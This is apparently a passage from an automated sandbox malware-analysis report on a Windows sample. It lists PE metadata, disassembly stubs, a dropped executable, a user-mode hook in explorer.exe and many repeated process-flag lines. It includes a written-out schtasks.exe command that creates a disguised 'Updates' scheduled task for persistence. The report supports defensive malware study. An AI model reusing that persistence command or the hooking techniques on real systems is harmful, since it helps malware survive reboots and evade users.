          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Ms5nQdSz5l.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Ms5nQdSz5l.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Ms5nQdSz5l.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.350623298.000000000F5A0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Ms5nQdSz5l.exe, 00000009.00000003.243388587.0000000000F30000.00000004.00000001.sdmp, mstsc.exe, 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Ms5nQdSz5l.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: Ms5nQdSz5l.exe, 00000009.00000002.389539524.0000000002FA0000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: Ms5nQdSz5l.exe, 00000009.00000002.389539524.0000000002FA0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.350623298.000000000F5A0000.00000002.00000001.sdmp
          Source: Ms5nQdSz5l.exeStatic PE information: 0xDA32965F [Tue Jan 1 18:33:03 2086 UTC]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0041D9B9 push ss; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0040E29B pushfd ; retf
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_00404443 push cs; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0041E586 push esp; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0114D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AED085 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AED0DB push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AED0D2 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AED9B9 push ss; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AED13C push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00ADE29B pushfd ; retf
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AD4443 push cs; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AEE586 push esp; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.5188778941
          Source: initial sampleStatic PE information: section name: .text entropy: 7.5188778941
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeFile created: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE3
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
